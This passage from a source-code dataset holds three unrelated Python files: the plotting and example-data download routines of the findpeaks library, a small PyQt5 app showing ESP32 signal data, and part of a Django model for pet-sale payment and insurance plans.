df_interp['x'].loc[df_interp['peak']].values\n ax2 = _plot_original(df_interp['y'].values, df_interp['x'].values, df_interp['labx'].values, min_peaks.astype(int), max_peaks.astype(int), title=title + ' (interpolated)', figsize=figsize, legend=legend, xlabel=xlabel, ylabel=ylabel)\n # Return axis\n return (ax2, ax1)\n\n def plot2d(self, figsize=None, limit=None):\n \"\"\"Plot the 2d results.\n\n Parameters\n ----------\n figsize : (int, int), (default: None)\n (width, height) in inches.\n\n Returns\n -------\n fig_axis : tuple containing axis for each figure.\n\n \"\"\"\n if not self.args['type']=='peaks2d':\n if self.verbose>=3: print('[findpeaks] >Requires results of 2D data.')\n return None\n ax_method, ax_mesh = None, None\n figsize = figsize if figsize is not None else self.args['figsize']\n # Plot preprocessing steps\n self.plot_preprocessing()\n\n # Setup figure\n if self.method=='mask':\n ax_method = self.plot_mask(figsize=figsize, limit=limit)\n if self.method=='topology':\n # Plot topology/persistence\n ax_method = self.plot_persistence(figsize=figsize)\n\n # Plot mesh\n ax_mesh = self.plot_mesh(figsize=figsize)\n\n # Return axis\n return (ax_method, ax_mesh)\n\n def plot_preprocessing(self):\n \"\"\"Plot the pre-processing steps.\n\n Returns\n -------\n None.\n\n \"\"\"\n if (not hasattr(self, 'results')) or (self.type=='peaks1d'):\n if self.verbose>=2: 
print('[findpeaks] >WARNING: Nothing to plot. Hint: run fit(X), where X is the (image) data. ')\n return None\n\n _ = self.preprocessing(X=self.results['Xraw'], showfig=True)\n\n def plot_mask(self, limit=None, figsize=None, cmap=None, text=True):\n \"\"\"Plot the masking.\n\n Parameters\n ----------\n limit : float, (default : None)\n Values > limit are set as regions of interest (ROI).\n figsize : (int, int), (default: None)\n (width, height) in inches.\n cmap : object (default : None)\n Colormap. The default is derived from whether the image is converted to gray or not. Other options are: plt.cm.hot_r.\n text : bool (default : True)\n Overlay text on the 2d-image that marks the peaks (p-number) and valleys (v-number)\n\n Returns\n -------\n fig_axis : tuple containing axis for each figure.\n\n \"\"\"\n if (self.type=='peaks1d'):\n if self.verbose>=2: print('[findpeaks] >WARNING: Nothing to plot. Hint: run fit(X), where X is the 2d-array (image). ')\n return None\n\n if limit is None: limit = self.limit\n # Only show above the limit\n Xdetect = self.results['Xdetect'].copy()\n if limit is not None:\n Xdetect[np.abs(Xdetect)<limit]=0\n\n # Get the indices of the detected peaks and valleys\n idx_peaks = np.where(Xdetect>0)\n idx_valleys = np.where(Xdetect<0)\n\n # Setup figure\n figsize = figsize if figsize is not None else self.args['figsize']\n fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=figsize)\n\n # Plot input image\n ax1.imshow(self.results['Xraw'], cmap, interpolation=\"nearest\")\n ax1.set_title('Input')\n ax1.grid(False)\n\n # For visualization purposes, plot all absolute numbers\n Xproc = self.results['Xproc'].copy()\n Xproc[idx_peaks]=0\n Xproc[idx_valleys]=1\n ax2.imshow(Xproc, cmap, interpolation=\"nearest\")\n ax2.set_title('Processed image')\n ax2.grid(False)\n\n # Masking\n ax3.imshow(np.abs(Xdetect), 'gray_r', interpolation=\"nearest\")\n ax3.set_title(self.method + ' (' + str(len(np.where(Xdetect>0)[0])) + ' peaks and ' + str(len(np.where(Xdetect<0)[0])) + ' valleys)')\n ax3.grid(False)\n\n if text:\n for idx in tqdm(zip(idx_peaks[0], idx_peaks[1]), disable=disable_tqdm(self.verbose)):\n ax2.text(idx[1], idx[0], 'p' + self.results['Xranked'][idx].astype(str))\n ax3.text(idx[1], idx[0], 'p' + self.results['Xranked'][idx].astype(str))\n\n for idx in tqdm(zip(idx_valleys[0], idx_valleys[1]), disable=disable_tqdm(self.verbose)):\n ax2.text(idx[1], idx[0], 'v' + self.results['Xranked'][idx].astype(str))\n ax3.text(idx[1], idx[0], 'v' + self.results['Xranked'][idx].astype(str))\n\n # Show plot\n plt.show()\n # Return\n return (ax1, ax2, ax3)\n\n def plot_mesh(self,\n wireframe=True,\n surface=True,\n rstride=2,\n cstride=2,\n cmap=plt.cm.hot_r,\n view=None,\n xlim=None,\n ylim=None,\n zlim=None,\n title='',\n figsize=None,\n savepath=None):\n \"\"\"Plot the 3d-mesh.\n\n Parameters\n ----------\n wireframe : bool, (default is True)\n Plot the wireframe\n surface : bool, (default is True)\n Plot the surface\n rstride : int, (default is 2)\n Array row stride (step size).\n cstride : int, (default is 2)\n Array column stride (step size).\n view : tuple, (default : None)\n * Rotate the mesh plot.\n * (0, 0) : y vs z\n * (0, 90) : x vs z\n * (90, 0) : y vs x\n * (90, 90) : x vs y\n cmap : object\n Colormap. 
The default is plt.cm.hot_r.\n xlim : tuple(int, int), (default: None)\n x-limit in the axis.\n None: No limit.\n [1, 5]: Limit between the range 1 and 5.\n [1, None]: Limit between range 1 and unlimited.\n [None, 5]: Limit between range unlimited and 5.\n ylim : tuple(int, int), (default: None)\n y-limit in the axis.\n None: No limit.\n [1, 5]: Limit between the range 1 and 5.\n [1, None]: Limit between range 1 and unlimited.\n [None, 5]: Limit between range unlimited and 5.\n zlim : tuple(int, int), (default: None)\n z-limit in the axis.\n None: No limit.\n [1, 5]: Limit between the range 1 and 5.\n [1, None]: Limit between range 1 and unlimited.\n [None, 5]: Limit between range unlimited and 5.\n figsize : (int, int), (default: None)\n (width, height) in inches.\n savepath : str (default : None)\n Path with filename to save the figure, eg: './tmp/my_image.png'\n \n Example\n -------\n >>> # Import library\n >>> from findpeaks import findpeaks\n >>> #\n >>> # Initialize\n >>> fp = findpeaks(method='topology', scale=False, denoise=None, togray=False, imsize=False, params={'window': 15})\n >>> #\n >>> # Load example data set\n >>> X = fp.import_example('2dpeaks')\n >>> #\n >>> # Fit model\n >>> fp.fit(X)\n >>> #\n >>> # Create mesh plot\n >>> fp.plot_mesh()\n >>> # Create mesh plot with limit on x-axis and y-axis\n >>> fp.plot_mesh(xlim=[10, 30], ylim=[4, 10], zlim=[None, 8])\n\n Returns\n -------\n fig_axis : tuple containing axis for each figure.\n\n \"\"\"\n if not hasattr(self, 'results'):\n if self.verbose>=2: print('[findpeaks] >WARNING: Nothing to plot. Hint: run the fit() function. ')\n return None\n if self.results.get('Xproc', None) is None:\n if self.verbose>=3: print('[findpeaks] >This analysis does not support mesh plotting. 
This may be caused because you are analysing 1D data.')\n return None\n\n figsize = figsize if figsize is not None else self.args['figsize']\n if self.verbose>=3: print('[findpeaks] >Plotting 3d-mesh..')\n ax1, ax2 = None, None\n if savepath is not None:\n savepath = str.replace(savepath, ',', '_')\n savepath = str.replace(savepath, '=', '_')\n\n # Compute meshgrid\n Z = self.results['Xproc'].copy()\n X, Y = np.mgrid[0:Z.shape[0], 0:Z.shape[1]]\n # To limit the x- and y-axis we use a trick: all values outside the limits are set to NaN in the Z-matrix.\n if xlim is not None:\n if xlim[0] is not None: Z[X<xlim[0]]=np.nan\n if xlim[1] is not None: Z[X>xlim[1]]=np.nan\n if ylim is not None:\n if ylim[0] is not None: Z[Y<ylim[0]]=np.nan\n if ylim[1] is not None: Z[Y>ylim[1]]=np.nan\n if zlim is not None:\n if zlim[0] is not None: Z[Z<zlim[0]]=np.nan\n if zlim[1] is not None: Z[Z>zlim[1]]=np.nan\n\n # Plot the figure\n if wireframe:\n fig = plt.figure(figsize=figsize)\n ax1 = fig.add_subplot(projection='3d')\n ax1.plot_wireframe(X, Y, Z, rstride=rstride, cstride=cstride, linewidth=0.8)\n ax1.set_xlabel('x-axis')\n ax1.set_ylabel('y-axis')\n ax1.set_zlabel('z-axis')\n if view is not None:\n ax1.view_init(view[0], view[1])\n # ax1.view_init(50, -10) # x vs y\n ax1.set_title(title)\n if xlim is not None: ax1.set_xlim3d(xlim[0], xlim[1])\n if ylim is not None: ax1.set_ylim3d(ylim[0], ylim[1])\n if zlim is not None: ax1.set_zlim3d(zlim[0], zlim[1])\n\n plt.show()\n if savepath is not None:\n if self.verbose>=3: print('[findpeaks] >Saving wireframe to disk..')\n fig.savefig(savepath)\n\n if surface:\n # Plot the figure\n fig = plt.figure(figsize=figsize)\n ax2 = fig.add_subplot(projection='3d')\n ax2.plot_surface(X, Y, Z, rstride=rstride, cstride=cstride, cmap=cmap, linewidth=0, shade=True, antialiased=False)\n if view is not None:\n ax2.view_init(view[0], view[1])\n ax2.set_xlabel('x-axis')\n ax2.set_ylabel('y-axis')\n ax2.set_zlabel('z-axis')\n ax2.set_title(title)\n if xlim is not None: ax2.set_xlim3d(xlim[0], xlim[1])\n if ylim is not None: ax2.set_ylim3d(ylim[0], ylim[1])\n if zlim is not None: ax2.set_zlim3d(zlim[0], zlim[1])\n plt.show()\n if savepath is not None:\n if self.verbose>=3: print('[findpeaks] >Saving surface to disk..')\n fig.savefig(savepath)\n\n # Plot with contours\n # fig = plt.figure(figsize=figsize)\n # ax3 = fig.gca(projection='3d')\n # X, Y, Z = results['xx'], results['yy'], results['Xproc']\n # ax3.plot_surface(results['xx'], results['yy'], results['Xproc'], rstride=rstride, cstride=cstride, cmap=plt.cm.coolwarm, linewidth=0, shade=True, alpha=0.3)\n # cset = ax3.contour(X, Y, Z, zdir='z', offset=-100, cmap=plt.cm.coolwarm)\n # cset = ax3.contour(X, Y, Z, zdir='x', offset=-40, cmap=plt.cm.coolwarm)\n # cset = ax3.contour(X, Y, Z, zdir='y', offset=40, cmap=plt.cm.coolwarm)\n # plt.show()\n return ax1, ax2\n\n def plot_persistence(self, figsize=(20, 8), fontsize_ax1=14, fontsize_ax2=14, xlabel='x-axis', ylabel='y-axis', verbose=None):\n \"\"\"Plot the homology-persistence.\n\n Parameters\n ----------\n figsize : (int, int), (default: None)\n (width, height) in inches.\n fontsize_ax1 : int, (default: 14)\n Font size for the labels in the left figure. Choose None for no text-labels.\n fontsize_ax2 : int, (default: 14)\n Font size for the labels in the right figure. Choose None for no text-labels.\n verbose : int (default : 3)\n Print to screen. 
0: None, 1: Error, 2: Warning, 3: Info, 4: Debug, 5: Trace.\n\n Returns\n -------\n ax1 : object\n Figure axis 1.\n ax2 : object\n Figure axis 2.\n\n \"\"\"\n if verbose is None: verbose=self.verbose\n if (self.method!='topology') or (not hasattr(self, 'results')):\n if verbose>=3: print('[findpeaks] >WARNING: Nothing to plot. Hint: run the .fit(method=\"topology\") function. ')\n return None\n\n # Setup figure\n figsize = figsize if figsize is not None else self.args['figsize']\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=figsize)\n\n # Create the persistence ax2\n ax2 = self._plot_persistence_ax2(fontsize_ax2, ax2, verbose)\n # Create the persistence ax1\n ax1, ax2 = self._plot_persistence_ax1(fontsize_ax1, ax1, ax2, figsize, xlabel, ylabel, verbose)\n # Plot\n plt.show()\n # Return\n return ax1, ax2\n\n def _plot_persistence_ax1(self, fontsize, ax1, ax2, figsize, xlabel, ylabel, verbose):\n if self.args['type']=='peaks1d':\n # Attach the ranking-labels\n if fontsize is not None:\n y = self.results['df']['y'].values\n x = self.results['df']['x'].values\n idx = np.where(self.results['df']['rank']>0)[0]\n for i in tqdm(idx, disable=disable_tqdm(verbose)):\n ax1.text(x[i], (y[i] + y[i] * 0.01), str(self.results['df']['rank'].iloc[i]), color='b', fontsize=fontsize)\n\n # minpers = 0\n min_peaks, max_peaks = np.array([]), np.array([])\n if np.any('valley' in self.whitelist):\n min_peaks = self.results['df']['x'].loc[self.results['df']['valley']].values\n if np.any('peak' in self.whitelist):\n max_peaks = self.results['df']['x'].loc[self.results['df']['peak']].values\n # Make the plot\n ax1 = _plot_original(self.results['df']['y'].values, self.results['df']['x'].values, self.results['df']['labx'].values, min_peaks.astype(int), max_peaks.astype(int), title='Persistence', figsize=figsize, legend=True, ax=ax1, xlabel=xlabel, ylabel=ylabel)\n # Set limits\n X = np.c_[self.results['df']['x'].values, self.results['df']['y'].values]\n ax1.set_xlim((np.min(X), np.max(X)))\n ax1.set_ylim((np.min(X), np.max(X)))\n else:\n # X = self.results['Xproc']\n # Make the figure\n Xdetect = np.zeros_like(self.results['Xproc']).astype(int)\n # fig, ax1 = plt.subplots()\n # minpers = 1\n # Plot the detected loci\n if verbose>=3: print('[findpeaks] >Plotting loci of birth..')\n ax1.set_title(\"Loci of births\")\n for i, homclass in tqdm(enumerate(self.results['groups0']), disable=disable_tqdm(verbose)):\n p_birth, bl, pers, p_death = homclass\n if (self.limit is None) or (pers > self.limit):\n y, x = p_birth\n Xdetect[y, x] = i + 1\n ax1.plot([x], [y], '.', c='b')\n ax1.text(x, y + 0.25, str(i), color='b', fontsize=fontsize)\n\n ax1.set_xlim((0, self.results['Xproc'].shape[1]))\n ax1.set_ylim((0, self.results['Xproc'].shape[0]))\n ax1.invert_yaxis()\n plt.gca().invert_yaxis()\n ax1.grid(True)\n # Draw the [0, 255] diagonal in ax2 because the input is an image.\n ax2.plot([0, 255], [0, 255], '-', c='grey')\n return ax1, ax2\n\n def _plot_persistence_ax2(self, fontsize, ax2, verbose):\n x = self.results['persistence']['birth_level'].values\n y = self.results['persistence']['death_level'].values\n ax2.plot(x, y, '.', c='b')\n if fontsize is not None:\n for i in tqdm(range(0, len(x)), disable=disable_tqdm(verbose)):\n ax2.text(x[i], (y[i] + y[i] * 0.01), str(i + 1), color='b', fontsize=fontsize)\n\n X = np.c_[x, y]\n ax2.plot([np.min(X), np.max(X)], [np.min(X), np.max(X)], '-', c='grey')\n 
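# The grey diagonal is the birth == death reference line: points far from it\n # have a large |birth level - death level| gap (high persistence) and mark the\n # most prominent peaks, whereas points hugging the diagonal are short-lived\n # and can usually be treated as noise.\n 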
ax2.set_xlabel(\"Birth level\")\n ax2.set_ylabel(\"Death level\")\n ax2.set_xlim((np.min(X), np.max(X)))\n ax2.set_ylim((np.min(X), np.max(X)))\n ax2.grid(True)\n return ax2\n\n def import_example(self, data='2dpeaks', url=None, sep=';', datadir=None):\n \"\"\"Import example dataset from github source.\n\n Description\n -----------\n Import one of the few datasets from github source or specify your own download url link.\n\n Parameters\n ----------\n data : str\n Name of datasets: \"1dpeaks\", \"2dpeaks\", \"2dpeaks_image\", 'btc', 'facebook'\n url : str\n URL link to the dataset.\n datadir : path-like\n Directory to store downloaded datasets in. Defaults to data sub-directory\n of findpeaks install location.\n\n Returns\n -------\n pd.DataFrame()\n Dataset containing mixed features.\n\n \"\"\"\n X = import_example(data=data, url=url, sep=sep, verbose=self.verbose, datadir=datadir)\n return X\n\n\n# %%\ndef _plot_original(X, xs, labx, min_peaks, max_peaks, title=None, legend=True, ax=None, figsize=(15, 8), xlabel=None, ylabel=None):\n uilabx = np.unique(labx)\n uilabx = uilabx[~np.isnan(uilabx)]\n\n if ax is None: fig, ax = plt.subplots(figsize=figsize)\n ax.plot(xs, X, 'k')\n if np.any(max_peaks):\n ax.plot(max_peaks, X[max_peaks], \"x\", label='Peak')\n if np.any(min_peaks):\n ax.plot(min_peaks, X[min_peaks], \"o\", label='Valley')\n\n # Color each detected label\n s=np.arange(0, len(X))\n for i in uilabx:\n idx=(labx==i)\n ax.plot(s[idx], X[idx])\n # plt.plot(s[idx], X[idx], label='peak' + str(i))\n\n if legend: ax.legend(loc=0)\n ax.set_title(title)\n if xlabel is not None: ax.set_xlabel(xlabel)\n if ylabel is not None: ax.set_ylabel(ylabel)\n ax.grid(True)\n plt.show()\n return ax\n\n\n# %% Import example dataset from github.\ndef import_example(data='2dpeaks', url=None, sep=';', verbose=3, datadir=None):\n \"\"\"Import example dataset from github source.\n\n Description\n -----------\n Import one of the few datasets from github source or specify your own download url link.\n\n Parameters\n ----------\n data : str\n Name of datasets: \"1dpeaks\", \"2dpeaks\", \"2dpeaks_image\", 'btc', 'facebook'\n url : str\n URL link to the dataset.\n verbose : int (default : 3)\n Print to screen. 0: None, 1: Error, 2: Warning, 3: Info, 4: Debug, 5: Trace.\n datadir : path-like\n Directory to store downloaded datasets in. Defaults to data sub-directory\n of findpeaks install location.\n\n Returns\n -------\n pd.DataFrame()\n Dataset containing mixed features.\n\n \"\"\"\n if url is not None:\n fn = os.path.basename(urlparse(url).path).strip()\n if not fn:\n if verbose>=3: print('[findpeaks] >Could not determine filename to download.')\n return None\n data, _ = os.path.splitext(fn)\n elif data=='2dpeaks_image':\n url='https://erdogant.github.io/datasets/' + data + '.png'\n fn = \"2dpeaks_image.png\"\n elif data=='2dpeaks':\n url='https://erdogant.github.io/datasets/' + data + '.zip'\n fn = \"2dpeaks.zip\"\n elif data=='1dpeaks':\n # x = [0, 13, 22, 30, 35, 38, 42, 51, 57, 67, 73, 75, 89, 126, 141, 150, 200 ]\n y = [1.5, 0.8, 1.2, 0.2, 0.4, 0.39, 0.42, 0.22, 0.23, 0.1, 0.11, 0.1, 0.14, 0.09, 0.04, 0.02, 0.01]\n # X = np.c_[x, y]\n return y\n elif (data=='btc') or (data=='facebook'):\n from caerus import caerus\n cs = caerus()\n X = cs.download_example(name=data, verbose=verbose)\n return X\n else:\n if verbose>=2: print('[findpeaks] >WARNING: Nothing to download. 
')\n return None\n\n if datadir is None: datadir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')\n PATH_TO_DATA = os.path.join(datadir, fn)\n if not os.path.isdir(datadir):\n os.makedirs(datadir, exist_ok=True)\n\n # Check file exists.\n if not os.path.isfile(PATH_TO_DATA):\n if verbose>=3: print('[findpeaks] >Downloading from github source: [%s]' %(url))\n r = requests.get(url, stream=True)\n with open(PATH_TO_DATA, \"wb\") as fd:\n for chunk in r.iter_content(chunk_size=1024):\n fd.write(chunk)\n\n # Import local dataset\n if verbose>=3: print('[findpeaks] >Import [%s]' %(PATH_TO_DATA))\n if data=='2dpeaks_image':\n cv2 = stats._import_cv2()\n X = cv2.imread(PATH_TO_DATA)\n else:\n X = pd.read_csv(PATH_TO_DATA, sep=sep).values\n # Return\n return X\n\n\n# Check url\ndef is_url(url):\n try:\n result = urlparse(url)\n return all([result.scheme, result.netloc])\n except ValueError:\n return False\n\n# %%\n# def disable_tqdm(verbose):\n # \"\"\"Set the verbosity messages.\"\"\"\n # return (True if ((verbose==0 or verbose is None) or verbose>3) else False)\n","repo_name":"erdogant/findpeaks","sub_path":"findpeaks/findpeaks.py","file_name":"findpeaks.py","file_ext":"py","file_size_in_byte":53817,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"31"} +{"seq_id":"15371994826","text":"import sys\nfrom PyQt5.uic import loadUi\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QDialog, QApplication\nfrom PyQt5.QtGui import QPixmap\nfrom receiver import ESP32\n\nclass IndoorMain(QDialog):\n '''Show image with a button constructor'''\n def __init__(self):\n super(IndoorMain, self).__init__()\n loadUi('indoor.ui', self)\n #self.btn_show_hidden_image.clicked.connect(self.add_image)\n self.chk_show_data.stateChanged.connect(self.mac_rssi)\n\n def mac_rssi(self):\n message = ESP32()\n if self.chk_show_data.isChecked():\n self.lbl_show_data.setText(message)\n\n\n# Main\napp = QApplication(sys.argv)\nindoormain = IndoorMain()\nwidget = QtWidgets.QStackedWidget()\nwidget.addWidget(indoormain)\nwidget.setFixedHeight(700)\nwidget.setFixedWidth(700)\nwidget.show()\ntry:\n sys.exit(app.exec_())\nexcept:\n print('Exiting')\n","repo_name":"thygolem/indoorQt","sub_path":"ips/indoor_app.py","file_name":"indoor_app.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7196576588","text":"from django.db import models\nfrom math import floor, ceil\nfrom datetime import date, timedelta, datetime\nfrom dateutil.relativedelta import relativedelta\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass RatePlan(models.Model):\n CATEGORY_CHOICE = (\n (0, '小型犬'),\n (1, '中型犬'),\n (2, '大型犬'),\n (3, '猫'),\n )\n DC_CHOICE = (\n (0, 'なし'),\n (1, '1vac'),\n (2, '2vac'),\n (3, '3vac'),\n )\n HS_CHOICE = (\n (0, '未加入'),\n (1, 'プラチナ年払い'),\n (2, 'スタンダード年払い'),\n (3, 'プラチナ月払い'),\n (4, 'スタンダード月払い'),\n )\n INSURANCE_CHOICE = (\n (0, '未加入'),\n (1, '100%年払い'),\n (2, '70%年払い'),\n (3, '100%月払い'),\n (4, '70%月払い'),\n )\n FOOD_CHOICE = (\n (0, 'なし'),\n (1, 'あり'),\n )\n HOME_CHOICE = (\n (0, 'なし'),\n (1, 'サークル無しセット'),\n (2, 'サークルセット(小)'),\n (3, 'サークルセット(大)'),\n )\n CARE_CHOICE = (\n (0, 'なし'),\n (1, '短毛用'),\n (2, '長毛用'),\n )\n LOAN_COMPANY_CHOICE = (\n ('一括', '一括'),\n ('PFクレジット', 'PFクレジット'),\n ('アプラス①', 'アプラス①'),\n ('アプラス②', 'アプラス②'),\n ('アプラス③', 'アプラス③'),\n ('PFS', 'PFS'),\n ('FLEX', 'FLEX'),\n ('セディナ', 'セディナ'),\n ('西京カード', '西京カード'),\n ('シティックス', 'シティックス'),\n )\n 
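# The two choice tuples below restrict optional bonus payments to Japan's\n # customary bonus seasons (summer: June-August, winter: December/January).\n 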
SUMMER_CHOICE = (\n (6, '6月'),\n (7, '7月'),\n (8, '8月'),\n )\n WINTER_CHOICE = (\n (12, '12月'),\n (1, '1月'),\n )\n\n pet_price = models.IntegerField('ペット代金', help_text='*税込み金額/半角数字で入力')\n other_price = models.IntegerField('その他購入代金', default=0)\n category = models.IntegerField('種別', choices=CATEGORY_CHOICE, default=0)\n dc_plan = models.IntegerField('ドクターズチェックP', help_text='*狂犬病接種の場合は3vacを選択', choices=DC_CHOICE, default=1)\n hs_plan = models.IntegerField('ほっとサポート', choices=HS_CHOICE, default=0)\n insurance_plan = models.IntegerField('ペット保険', choices=INSURANCE_CHOICE, default=0)\n insurance_discount = models.BooleanField('保険多頭割', help_text='*多頭割の場合はチェック', default=False)\n food_plan = models.IntegerField('ごはんセット', choices=FOOD_CHOICE, default=0)\n home_plan = models.IntegerField('おうちセット', choices=HOME_CHOICE, default=0)\n care_plan = models.IntegerField('しつけお手入れセット', choices=CARE_CHOICE, default=0)\n loan_company = models.CharField('支払方法', max_length=10, choices=LOAN_COMPANY_CHOICE, default='アプラス①')\n down_payment = models.IntegerField('頭金', default=0)\n bonus_setting = models.BooleanField('ボーナス支払設定', help_text='*ボーナス支払を設定する場合はチェック', default=False)\n bonus_payment = models.IntegerField('ボーナス加算額', help_text='*1000円単位で入力', default=0)\n bonus_s_month = models.IntegerField('ボーナス月(夏)', choices=SUMMER_CHOICE, default=6)\n bonus_w_month = models.IntegerField('ボーナス月(冬)', choices=WINTER_CHOICE, default=12)\n created_at = models.DateField('作成日', default=date.today)\n user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name='作成者')\n\n category_dict = ('小型犬', '中型犬', '大型犬', '猫',)\n sub_category_dict = ('犬', '犬', '犬', '猫')\n dc_dict = {\n '犬': (0, 58190, 68310, 79090),\n '猫': (0, 48840, 58960, 58960),\n }\n hs_r_dict = {\n '犬': 0.18,\n '猫': 0.15,\n }\n insurance_dict = {\n '小型犬': (0, 65020, 50280, 19550, 17000),\n '中型犬': (0, 77610, 59690, 23380, 20260),\n '大型犬': (0, 85320, 65450, 25720, 22280),\n '猫': (0, 53550, 41710, 16070, 14020),\n }\n insurance_dc_dict = {\n '小型犬': (0, 61880, 47980, 18680, 16340),\n '中型犬': (0, 73860, 56970, 22330, 19510),\n '大型犬': (0, 81200, 62470, 24580, 21440),\n '猫': (0, 50960, 39800, 15350, 13480),\n }\n insurance_m_dict = {\n '小型犬': (0, 0, 0, 5750, 4210),\n '中型犬': (0, 0, 0, 6860, 4980),\n '大型犬': (0, 0, 0, 7540, 5460),\n '猫': (0, 0, 0, 4740, 3500),\n }\n insurance_dc_m_dict = {\n '小型犬': (0, 0, 0, 5460, 3990),\n '中型犬': (0, 0, 0, 6510, 4730),\n '大型犬': (0, 0, 0, 7160, 5180),\n '猫': (0, 0, 0, 4500, 3320),\n }\n food_dict = {\n '犬': (0, 27500),\n '猫': (0, 18590),\n }\n home_dict = {\n '犬': (0, 20980, 39380, 61600),\n '猫': (0, 0, 36080, 43450),\n }\n care_dict = {\n '犬': (0, 19360, 20900),\n '猫': (0, 12870, 12870),\n }\n loan_dict = {\n 'PFクレジット':\n {'回数':(1,2,3,5,6,10,12,15,18,20,24,30,36,42,48,54,60,72,84),\n '金利': (1.50,2.26,3.01,4.54,5.32,8.43,10.02,12.42,14.85,16.49,19.82,24.92,30.15,35.51,41.00,46.62,52.36,64.22,76.55),\n '支払日': 27,\n '開始月': 1,},\n 'アプラス①':\n {'回数':(3,6,10,12,15,18,20,24,30,36,42,48,54,60,72,84),\n '金利': (0.00,0.00,0.00,8.16,10.20,12.20,13.60,16.30,20.40,24.50,28.60,32.60,36.70,40.80,49.00,57.10),\n '支払日': 27,\n '開始月': 1,},\n 'アプラス②':\n {'回数':(3,6,10,12,15,18,20,24,30,36,42,48,54,60,72,84),\n '金利': (0.00,0.00,0.00,8.16,10.20,12.20,13.60,16.30,20.40,24.50,28.60,32.60,36.70,40.80,49.00,57.10),\n '支払日': 27,\n '開始月': 2,},\n 'アプラス③':\n {'回数':(3,6,10,12,15,18,20,24,30,36,42,48,54,60,72,84),\n '金利': (0.00,0.00,0.00,8.16,10.20,12.20,13.60,16.30,20.40,24.50,28.60,32.60,36.70,40.80,49.00,57.10),\n '支払日': 27,\n '開始月': 3,},\n 'PFS':\n 
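# Each company entry maps instalment counts ('回数') to the total interest\n # charged as a percentage of the financed principal ('金利'; see ratefee_list,\n # which computes capital * rate / 100), plus the day of month payments fall\n # on ('支払日') and the month offset at which the schedule starts ('開始月').\n # Example: for アプラス①, the 12-instalment plan (index 3 in both tuples)\n # adds 8.16% of the principal as interest.\n 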
{'回数':(1,3,6,10,12,15,18,20,24,30,36,42,48,54,60,72,84),\n '金利': (0.00,0.00,0.00,0.00,8.16,10.20,12.24,13.60,16.32,20.40,24.48,28.56,32.64,36.72,40.80,48.96,57.12),\n '支払日': 27,\n '開始月': 1,},\n 'FLEX':\n {'回数':(3,10,12,15,18,20,24,36,48,60,72,84),\n '金利': (2.40,8.00,9.60,12.00,14.40,16.00,19.20,28.80,38.40,48.00,57.60,67.20),\n '支払日': 27,\n '開始月': 2,},\n 'セディナ':\n {'回数':(1,2,3,5,8,10,12,15,18,20,24,30,36,42,48,54,60,72,84),\n '金利': (0.00,0.00,0.00,0.00,0.00,0.00,6.00,8.00,9.00,10.50,12.60,16.00,18.90,22.20,25.40,28.60,31.80,38.10,44.50),\n '支払日': 27,\n '開始月': 1,},\n '西京カード':\n {'回数':(1,2,3,5,10,12,15,18,20,24,30,36,42,48,54,60),\n '金利': (),\n '支払日': 6,\n '開始月': 2,},\n 'シティックス':\n {'回数':(1,2,3,5,10,12,15,18,20,24,30,36,42,48,54,60),\n '金利': (),\n '支払日': 27,\n '開始月': 1,},\n }\n\n def __str__(self):\n return str(self.pet_price)\n\n \"\"\"Doctor's check price\"\"\"\n def dc_price(self, category, dc_plan):\n sub_category = RatePlan.sub_category_dict[category]\n dc_price = RatePlan.dc_dict[sub_category][dc_plan]\n return dc_price\n\n \"\"\"Hotto Support price\"\"\"\n def hs_price(self, pet_price, category, hs_plan):\n hs_rate = RatePlan.hs_r_dict[RatePlan.sub_category_dict[category]]\n if pet_price <= 110000:\n hs_price = int(110000 * hs_rate)\n if hs_plan == 1:\n hs_price += 20000\n elif hs_plan == 3:\n hs_price = floor((hs_price + 20000) / 120) * 30\n elif hs_plan == 4:\n hs_price = floor(hs_price / 120) * 30\n else:\n hs_price = 0\n else:\n hs_price = int(pet_price * hs_rate)\n if hs_plan == 1:\n hs_price += 20000\n elif hs_plan == 3:\n hs_price = floor((hs_price + 20000) / 120) * 30\n elif hs_plan == 4:\n hs_price = floor(hs_price / 120) * 30\n else:\n hs_price = 0\n return hs_price\n\n \"\"\"Hotto Support monthly payment (used only when monthly payment is selected)\"\"\"\n def hs_m_price(self, hs_price):\n hs_m_price = int(hs_price / 3)\n return hs_m_price\n\n \"\"\"Pet insurance price\"\"\"\n def insurance_price(self, category, insurance_plan, insurance_discount):\n main_category = RatePlan.category_dict[category]\n if insurance_discount == False:\n insurance_price = RatePlan.insurance_dict[main_category][insurance_plan]\n elif insurance_discount == True:\n insurance_price = RatePlan.insurance_dc_dict[main_category][insurance_plan]\n return insurance_price\n\n \"\"\"Insurance monthly payment (used only when monthly payment is selected)\"\"\"\n def insurance_m_price(self, category, insurance_plan, insurance_discount):\n main_category = RatePlan.category_dict[category]\n if insurance_discount == False:\n insurance_m_price = RatePlan.insurance_m_dict[main_category][insurance_plan]\n else:\n insurance_m_price = RatePlan.insurance_dc_m_dict[main_category][insurance_plan]\n return insurance_m_price\n\n \"\"\"Food set price\"\"\"\n def food_price(self, category, food_plan):\n sub_category = RatePlan.sub_category_dict[category]\n food_price = RatePlan.food_dict[sub_category][food_plan]\n return food_price\n\n \"\"\"Home set price\"\"\"\n def home_price(self, category, home_plan):\n sub_category = RatePlan.sub_category_dict[category]\n home_price = RatePlan.home_dict[sub_category][home_plan]\n return home_price\n\n \"\"\"Training and grooming set price\"\"\"\n def care_price(self, category, care_plan):\n sub_category = RatePlan.sub_category_dict[category]\n care_price = RatePlan.care_dict[sub_category][care_plan]\n return care_price\n\n \"\"\"Supplies set discount\"\"\"\n def set_discount(self, category, food_plan, home_plan, care_plan):\n sub_category = RatePlan.sub_category_dict[category]\n set_discount = 0\n if sub_category == '犬':\n if food_plan == 1:\n if care_plan == 1 or care_plan == 2:\n if home_plan == 2:\n set_discount = -6000\n elif home_plan == 3:\n set_discount = 
